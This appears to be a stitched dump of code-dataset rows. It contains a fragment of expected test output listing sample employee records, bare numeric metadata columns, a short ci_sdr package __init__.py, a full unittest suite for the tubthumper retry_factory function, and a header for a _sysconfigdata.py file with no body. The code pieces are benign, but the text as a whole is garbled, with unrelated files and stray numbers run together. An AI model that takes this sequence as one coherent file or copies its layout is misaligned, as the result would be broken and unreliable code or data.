#__IDS_EXPECTED__
#Record 1 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 2 : 000020 PL2100 30 1.00 1982-01-01 1982-09-15 000020
#>>000020,MICHAEL,L,THOMPSON,THOMPSON,3476,1973-10-10
#Record 3 : 000340 OP2013 140 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 4 : 000340 OP2013 170 0.50 1982-01-01 1983-02-01 000340
#>>000340,JASON,R,GOUNOT,GOUNOT,5698,1947-05-05
#Record 5 : 000330 OP2012 140 0.25 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 6 : 000330 OP2012 160 0.75 1982-01-01 1983-02-01 000330
#>>000330,WING, ,LEE,LEE,2103,1976-02-23
#Record 7 : 000320 OP2011 140 0.75 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 8 : 000320 OP2011 150 0.25 1982-01-01 1983-02-01 000320
#>>000320,RAMLAL,V,MEHTA,MEHTA,9990,1965-07-07
#Record 9 : 000100 OP2010 10 1.00 1982-01-01 1983-02-01 000100
#>>000100,THEODORE,Q,SPENSER,SPENSER,0972,1980-06-19
#Record 10 : 000050 OP2010 10 0.75 1982-01-01 1983-02-01 000050
#>>000050,JOHN,B,GEYER,GEYER,6789,1949-08-17
| 48.664
| 149
| 0.682065
| 1,090
| 6,083
| 3.766972
| 0.136697
| 0.058451
| 0.077935
| 0.093522
| 0.838042
| 0.826839
| 0.809547
| 0.809547
| 0.809547
| 0.809547
| 0
| 0.455961
| 0.165708
| 6,083
| 124
| 150
| 49.056452
| 0.353103
| 0.767878
| 0
| 0.074074
| 0
| 0
| 0.151927
| 0.016629
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.074074
| false
| 0.037037
| 0.148148
| 0
| 0.259259
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9c78c6f7cb61b966ce06c55bf83a922836d55b06
| 53
|
py
|
Python
|
ci_sdr/pt/__init__.py
|
boeddeker/ci_sdr
|
e1b5c1f9b25baab91f04eb2c96ed392cf0b313cd
|
[
"MIT"
] | 38
|
2021-01-16T22:59:42.000Z
|
2022-03-06T12:34:33.000Z
|
ci_sdr/pt/__init__.py
|
boeddeker/ci_sdr
|
e1b5c1f9b25baab91f04eb2c96ed392cf0b313cd
|
[
"MIT"
] | 2
|
2021-01-26T16:25:26.000Z
|
2021-05-27T08:07:09.000Z
|
ci_sdr/pt/__init__.py
|
boeddeker/ci_sdr
|
e1b5c1f9b25baab91f04eb2c96ed392cf0b313cd
|
[
"MIT"
] | 7
|
2021-01-18T01:43:38.000Z
|
2021-06-23T12:06:49.000Z
|
from .sdr import ci_sdr
from .sdr import ci_sdr_loss
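# Editorial usage note (not part of the original file): these re-exports let
# callers write `from ci_sdr.pt import ci_sdr, ci_sdr_loss` instead of
# importing from the internal `.sdr` submodule directly.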
| 17.666667
| 28
| 0.811321
| 11
| 53
| 3.636364
| 0.454545
| 0.35
| 0.65
| 0.75
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 53
| 2
| 29
| 26.5
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
9c7bfba715ee90a3390b4067134768e01b4660c9
| 31,870
|
py
|
Python
|
test/unit_tests/test_retry_factory.py
|
matteosox/tubthumper
|
4213b65ac42c68a9105ce691760cea6bb329ca71
|
[
"Apache-2.0"
] | 2
|
2021-10-17T06:29:56.000Z
|
2022-02-24T13:10:13.000Z
|
test/unit_tests/test_retry_factory.py
|
matteosox/tubthumper
|
4213b65ac42c68a9105ce691760cea6bb329ca71
|
[
"Apache-2.0"
] | 11
|
2021-10-09T05:18:21.000Z
|
2022-01-04T23:08:19.000Z
|
test/unit_tests/test_retry_factory.py
|
matteosox/tubthumper
|
4213b65ac42c68a9105ce691760cea6bb329ca71
|
[
"Apache-2.0"
] | null | null | null |
"""Unit tests for the function retry_decorator"""
# pylint: disable=too-many-public-methods
import inspect
import logging
import random
import unittest
from mock import AsyncMock, Mock
from tubthumper import RetryError, retry_factory
from . import constants, util
tubthumper_logger = logging.getLogger("tubthumper")
tubthumper_logger.setLevel(logging.ERROR) # silence warnings from retries
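# Editorial reference (not part of the original file): the signature below is
# inferred from how the tests call retry_factory; parameter defaults are
# assumptions, not tubthumper's documented API.
#
#     wrapped = retry_factory(func, exceptions=..., retry_limit=...,
#                             time_limit=..., init_backoff=..., jitter=...,
#                             reraise=...)
#
# The tests pin down the contract: only the listed exception(s) trigger a
# retry; exhausting retry_limit or time_limit raises RetryError (or, with
# reraise=True, re-raises the last caught exception); with jitter=False the
# sleep between attempts doubles each retry, starting from init_backoff.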
class TestRetryFactoryAsync(util.IsolatedAsyncioTestCase):
"""Test case for retry factory with coroutines"""
async def test_coroutine_success(self):
"""Test success of a simple coroutine passed into retry"""
return_value = 1
func = AsyncMock(return_value=return_value)
wrapped_func = retry_factory(func, exceptions=constants.TestException)
result = await wrapped_func()
self.assertEqual(result, return_value)
func.assert_awaited_once_with()
@staticmethod
async def test_coroutine_call():
"""Test coroutine is called with appropriate arguments"""
func = AsyncMock()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
await wrapped_func(*constants.ARGS, **constants.KWARGS)
func.assert_awaited_once_with(*constants.ARGS, **constants.KWARGS)
async def test_single_exception(self):
"""Test providing a single exception to catch is caught and retried"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_diff_single_exception(self):
"""Test providing a single exception and throwing a different one is not caught and retried"""
side_effect = TypeError
func = AsyncMock(side_effect=side_effect)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1
)
with self.assertRaises(side_effect):
await wrapped_func()
func.assert_awaited_once_with()
async def test_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing one of them is caught and retried"""
exceptions = (constants.TestException, TypeError)
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=exceptions, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_diff_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing a different one is not caught and retried"""
exceptions = (ValueError, TypeError)
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(func, exceptions=exceptions, retry_limit=1)
with self.assertRaises(constants.TestException):
await wrapped_func()
func.assert_awaited_once_with()
async def test_reraise(self):
"""Test that setting reraise to True results in raising the caught exception, not RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
reraise=True,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(constants.TestException):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_reraise_with_time_limit(self):
"""Test that setting reraise to True with a time limit results in raising the caught exception, not RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
reraise=True,
time_limit=0,
exceptions=constants.TestException,
)
with self.assertRaises(constants.TestException):
await wrapped_func()
self.assertEqual(func.await_count, 1)
async def test_retry_limit_0(self):
"""Test retry_limit set to 0 calls function once and raises RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, retry_limit=0, exceptions=constants.TestException
)
with self.assertRaises(RetryError):
await wrapped_func()
func.assert_awaited_once_with()
async def test_time_limit(self):
"""Test that setting a time_limit results in a RetryError"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, time_limit=0, exceptions=constants.TestException
)
with self.assertRaises(RetryError):
await wrapped_func()
func.assert_awaited_once_with()
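# A reading of test_time_limit and test_reraise_with_time_limit above:
# time_limit=0 exhausts the retry budget immediately, so the function runs
# exactly once and either RetryError or (with reraise=True) the original
# exception propagates, with no backoff sleep in between.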
async def test_jitter(self):
"""Test jitter results in random variation in backoff time, predictable thanks to setting the random seed"""
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func, retry_limit=1, exceptions=constants.TestException
)
random.seed(constants.RANDOM_SEED)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, constants.RANDOM_QUANTITY)
async def test_init_backoff(self):
"""Test init_backoff results in appropriate backoff time"""
init_backoff = 0.01
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
init_backoff=init_backoff,
retry_limit=1,
jitter=False,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, init_backoff)
async def test_exponential_backoff(self):
"""Test default exponential backoff time"""
init_backoff = 0.01
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
init_backoff=init_backoff,
retry_limit=2,
jitter=False,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], 2 * init_backoff
)
async def test_custom_exponential_backoff(self):
"""Test custom exponential backoff time"""
init_backoff = 0.01
exponential = 1.5
func = util.timed_mock(async_mock=True, side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
init_backoff=init_backoff,
exponential=exponential,
retry_limit=2,
jitter=False,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], exponential * init_backoff
)
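# Sketch of the schedule the three backoff tests above assert (assuming
# jitter is disabled, as they set): the sleep before retry n is
# init_backoff * exponential**n, so init_backoff=0.01 with the default
# exponential of 2 yields delays of 0.01, 0.02, 0.04, ..., while
# exponential=1.5 yields 0.01, 0.015, 0.0225, ...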
async def test_logging(self):
"""Test retrying a function results in a warning log statement"""
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
# assertLogs goes outermost: if RetryError escaped through it, its
# log-presence check would be skipped entirely
with self.assertLogs(logger=tubthumper_logger, level=logging.WARNING):
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_custom_logging_level(self):
"""Test that setting a custom log level works"""
level = logging.INFO
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
log_level=level,
)
with self.assertLogs(logger=tubthumper_logger, level=level):
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_custom_logger(self):
"""Test that supplying a custom logger works"""
logger = logging.getLogger(__name__)
func = AsyncMock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
logger=logger,  # supply the custom logger the docstring promises to exercise
)
with self.assertLogs(logger=logger, level=logging.WARNING):
with self.assertRaises(RetryError):
await wrapped_func()
self.assertEqual(func.await_count, 2)
async def test_method_of_object(self):
"""Test retry and correct call structure for wrapping an object's async method"""
class _Class:
method = util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
obj = _Class()
func = obj.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(obj, *constants.ARGS, **constants.KWARGS)
async def test_method_of_class(self):
"""Test retry and correct call structure for wrapping a class's async method"""
class _Class:
method = util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
func = _Class.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(*constants.ARGS, **constants.KWARGS)
async def test_classmethod_of_object(self):
"""Test retry and correct call structure for wrapping an object's async classmethod"""
class _Class:
method = classmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
obj = _Class()
func = obj.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
async def test_classmethod_of_class(self):
"""Test retry and correct call structure for wrapping a class's async classmethod"""
class _Class:
method = classmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
func = _Class.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
async def test_staticmethod_of_object(self):
"""Test retry and correct call structure for wrapping a object's async staticmethod"""
class _Class:
method = staticmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
obj = _Class()
func = obj.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(*constants.ARGS, **constants.KWARGS)
async def test_staticmethod_of_class(self):
"""Test retry and correct call structure for wrapping a class's async staticmethod"""
class _Class:
method = staticmethod(
util.create_method_mock(
async_mock=True, side_effect=constants.TestException
)
)
func = _Class.method
wrapped_func = retry_factory(
func,
retry_limit=1,
init_backoff=0,
exceptions=constants.TestException,
)
with self.assertRaises(RetryError):
await wrapped_func(*constants.ARGS, **constants.KWARGS)
self.assertEqual(func.await_count, 2)
func.assert_called_with(*constants.ARGS, **constants.KWARGS)
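# Taken together, the method tests above pin down the descriptor behavior
# the asserts rely on: wrapping a plain method's raw function still passes
# the instance, a classmethod passes the class, and a staticmethod passes
# neither -- mirrored below for regular (non-async) functions.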
class TestRetryFactory(unittest.TestCase):
"""Test case for retry factory"""
def test_success(self):
"""Test success of a simple function decorated with retry_decorator"""
return_value = 1
func = Mock(return_value=return_value)
wrapped_func = retry_factory(func, exceptions=constants.TestException)
result = wrapped_func()
self.assertEqual(result, return_value)
func.assert_called_once_with()
def test_only_keyword_args(self):
"""Test that the retry decorator only allows keyword arguments"""
func = Mock()
with self.assertRaises(TypeError):
retry_factory( # pylint: disable=missing-kwoa,too-many-function-args
func,
constants.TestException,
)
@staticmethod
def test_func_call():
"""Test function is called with appropriate arguments"""
func = Mock()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
wrapped_func(*constants.ARGS, **constants.KWARGS)
func.assert_called_once_with(*constants.ARGS, **constants.KWARGS)
def test_single_exception(self):
"""Test providing a single exception to catch is caught and retried"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_diff_single_exception(self):
"""Test providing a single exception and throwing a different one is not caught and retried"""
side_effect = TypeError
func = Mock(side_effect=side_effect)
wrapped_func = retry_factory(func, exceptions=constants.TestException)
with self.assertRaises(side_effect):
wrapped_func()
func.assert_called_once_with()
def test_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing one of them is caught and retried"""
exceptions = (constants.TestException, TypeError)
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=exceptions,
retry_limit=1,
init_backoff=0,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_diff_multiple_exceptions(self):
"""Test providing a tuple of exceptions and throwing a different one is not caught and retried"""
exceptions = (ValueError, TypeError)
side_effect = constants.TestException
func = Mock(side_effect=side_effect)
wrapped_func = retry_factory(func, exceptions=exceptions)
with self.assertRaises(constants.TestException):
wrapped_func()
func.assert_called_once_with()
def test_reraise(self):
"""Test that setting reraise to True results in raising the caught exception, not RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
reraise=True,
retry_limit=1,
init_backoff=0,
)
with self.assertRaises(constants.TestException):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_reraise_with_time_limit(self):
"""Test that setting reraise to True with a time limit results in raising the caught exception, not RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func,
reraise=True,
time_limit=0,
exceptions=constants.TestException,
)
with self.assertRaises(constants.TestException):
wrapped_func()
self.assertEqual(func.call_count, 1)
def test_retry_limit_0(self):
"""Test retry_limit set to 0 calls function once and raises RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=0
)
with self.assertRaises(RetryError):
wrapped_func()
func.assert_called_once_with()
def test_time_limit(self):
"""Test that setting a time_limit results in a RetryError"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, time_limit=0
)
with self.assertRaises(RetryError):
wrapped_func()
func.assert_called_once_with()
def test_jitter(self):
"""Test jitter results in random variation in backoff time, predictable thanks to setting the random seed"""
func = util.timed_mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1
)
random.seed(constants.RANDOM_SEED)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, constants.RANDOM_QUANTITY)
def test_init_backoff(self):
"""Test init_backoff results in appropriate backoff time"""
func = util.timed_mock(side_effect=constants.TestException)
init_backoff = 0.01
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
init_backoff=init_backoff,
retry_limit=1,
jitter=False,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
duration = func.call_times[1] - func.call_times[0]
util.assert_time(self, duration, init_backoff)
def test_exponential_backoff(self):
"""Test default exponential backoff time"""
func = util.timed_mock(side_effect=constants.TestException)
init_backoff = 0.01
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
init_backoff=init_backoff,
retry_limit=2,
jitter=False,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], 2 * init_backoff
)
def test_custom_exponential_backoff(self):
"""Test custom exponential backoff time"""
func = util.timed_mock(side_effect=constants.TestException)
init_backoff = 0.01
exponential = 1.5
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
init_backoff=init_backoff,
exponential=exponential,
retry_limit=2,
jitter=False,
)
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 3)
util.assert_time(self, func.call_times[1] - func.call_times[0], init_backoff)
util.assert_time(
self, func.call_times[2] - func.call_times[1], exponential * init_backoff
)
def test_logging(self):
"""Test retrying results in a warning log statement"""
func = Mock(side_effect=constants.TestException)
wrapped_func = retry_factory(
func, exceptions=constants.TestException, retry_limit=1, init_backoff=0
)
with self.assertLogs(logger=tubthumper_logger, level=logging.WARNING):
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_custom_logging_level(self):
"""Test that setting a custom log level works"""
func = Mock(side_effect=constants.TestException)
level = logging.INFO
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
log_level=level,
)
with self.assertLogs(logger=tubthumper_logger, level=level):
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_custom_logger(self):
"""Test that supplying a custom logger works"""
func = Mock(side_effect=constants.TestException)
logger = logging.getLogger(__name__)
wrapped_func = retry_factory(
func,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
logger=logger,  # supply the custom logger the docstring promises to exercise
)
with self.assertLogs(logger=logger, level=logging.WARNING):
with self.assertRaises(RetryError):
wrapped_func()
self.assertEqual(func.call_count, 2)
def test_method_of_object(self):
"""Test retry and correct call structure for decorating an object's method"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
obj = _Class()
with self.assertRaises(RetryError):
obj.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(obj, *constants.ARGS, **constants.KWARGS)
def test_method_of_class(self):
"""Test retry and correct call structure for decorating a class's method"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
with self.assertRaises(RetryError):
_Class.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(*constants.ARGS, **constants.KWARGS)
def test_classmethod_of_object(self):
"""Test retry and correct call structure for decorating an object's classmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = classmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
obj = _Class()
with self.assertRaises(RetryError):
obj.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
def test_classmethod_of_class(self):
"""Test retry and correct call structure for decorating a class's classmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = classmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
with self.assertRaises(RetryError):
_Class.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(_Class, *constants.ARGS, **constants.KWARGS)
def test_staticmethod_of_object(self):
"""Test retry and correct call structure for decorating a object's staticmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = staticmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
obj = _Class()
with self.assertRaises(RetryError):
obj.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(*constants.ARGS, **constants.KWARGS)
def test_staticmethod_of_class(self):
"""Test retry and correct call structure for decorating a class's staticmethod"""
method_mock = util.create_method_mock(side_effect=constants.TestException)
class _Class:
method = staticmethod(
retry_factory(
method_mock,
exceptions=constants.TestException,
retry_limit=1,
init_backoff=0,
)
)
with self.assertRaises(RetryError):
_Class.method(*constants.ARGS, **constants.KWARGS)
self.assertEqual(method_mock.call_count, 2)
method_mock.assert_called_with(*constants.ARGS, **constants.KWARGS)
def test_function_signature(self):
"""Test that the decorated function has the same signature as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_sig = inspect.signature(func)
dec_func_sig = inspect.signature(wrapped_func)
self.assertEqual(func_sig, dec_func_sig)
def test_function_name(self):
"""Test that the decorated function has the same __name__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_name = func.__name__
dec_func_name = wrapped_func.__name__
self.assertEqual(func_name, dec_func_name)
def test_function_qualname(self):
"""Test that the decorated function has the same __qualname__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_qualname = func.__qualname__
dec_func_qualname = wrapped_func.__qualname__
self.assertEqual(func_qualname, dec_func_qualname)
def test_function_module(self):
"""Test that the decorated function has the same __module__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_module = func.__module__
dec_func_module = wrapped_func.__module__
self.assertEqual(func_module, dec_func_module)
def test_function_docstr(self):
"""Test that the decorated function has the same __doc__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_docstr = func.__doc__
dec_func_docstr = wrapped_func.__doc__
self.assertEqual(func_docstr, dec_func_docstr)
def test_function_annotations(self):
"""Test that the decorated function has the same __annotations__ as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
func_annotations = func.__annotations__
dec_func_annotations = wrapped_func.__annotations__
self.assertEqual(func_annotations, dec_func_annotations)
def test_function_attrs(self):
"""Test that the decorated function has the same attributes as the original"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
for key in func.__dict__:
func_val = getattr(func, key)
dec_func_val = getattr(wrapped_func, key)
self.assertEqual(func_val, dec_func_val)
def test_isfunction(self):
"""Test the the decorated function is recognized as a function"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
self.assertTrue(inspect.isfunction(wrapped_func))
def test_isroutine(self):
"""Test the the decorated function is recognized as a routine"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
self.assertTrue(inspect.isroutine(wrapped_func))
def test_ismethod(self):
"""Test the the decorated function is recognized as a method"""
func = util.get_a_func()
class _Class:
method = retry_factory(func, exceptions=constants.TestException)
obj = _Class()
self.assertTrue(inspect.ismethod(obj.method))
def test_iscoroutinefunction(self):
"""Test the the decorated function is recognized as a coroutine function"""
async_func = util.get_an_async_func()
wrapped_func = retry_factory(async_func, exceptions=constants.TestException)
self.assertTrue(inspect.iscoroutinefunction(wrapped_func))
def test_repr(self):
"""Test that the decorated function has the proper repr"""
func = util.get_a_func()
wrapped_func = retry_factory(func, exceptions=constants.TestException)
dec_func_repr = repr(wrapped_func)
self.assertRegex(dec_func_repr, constants.REPR_REGEX)
if __name__ == "__main__":
unittest.main()
| 39.639303
| 121
| 0.64647
| 3,508
| 31,870
| 5.632269
| 0.053022
| 0.114688
| 0.090697
| 0.059368
| 0.900445
| 0.877771
| 0.866231
| 0.845379
| 0.82478
| 0.796589
| 0
| 0.006553
| 0.272231
| 31,870
| 803
| 122
| 39.688668
| 0.845305
| 0.084405
| 0
| 0.71118
| 0
| 0
| 0.00066
| 0
| 0
| 0
| 0
| 0
| 0.206522
| 1
| 0.055901
| false
| 0
| 0.01087
| 0
| 0.090062
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c82334ebc12ece6182b0d1b624c95925f4846b2
| 18,167
|
py
|
Python
|
www/src/Lib/_sysconfigdata.py
|
raspberrypieman/brython
|
2cc23d1da6acda604d4a56b4c9d464eb7e374eda
|
[
"BSD-3-Clause"
] | 5,926
|
2015-01-01T07:45:08.000Z
|
2022-03-31T12:34:38.000Z
|
www/src/Lib/_sysconfigdata.py
|
raspberrypieman/brython
|
2cc23d1da6acda604d4a56b4c9d464eb7e374eda
|
[
"BSD-3-Clause"
] | 1,728
|
2015-01-01T01:09:12.000Z
|
2022-03-30T23:25:22.000Z
|
www/src/Lib/_sysconfigdata.py
|
raspberrypieman/brython
|
2cc23d1da6acda604d4a56b4c9d464eb7e374eda
|
[
"BSD-3-Clause"
] | 574
|
2015-01-02T01:36:10.000Z
|
2022-03-26T10:18:48.000Z
|
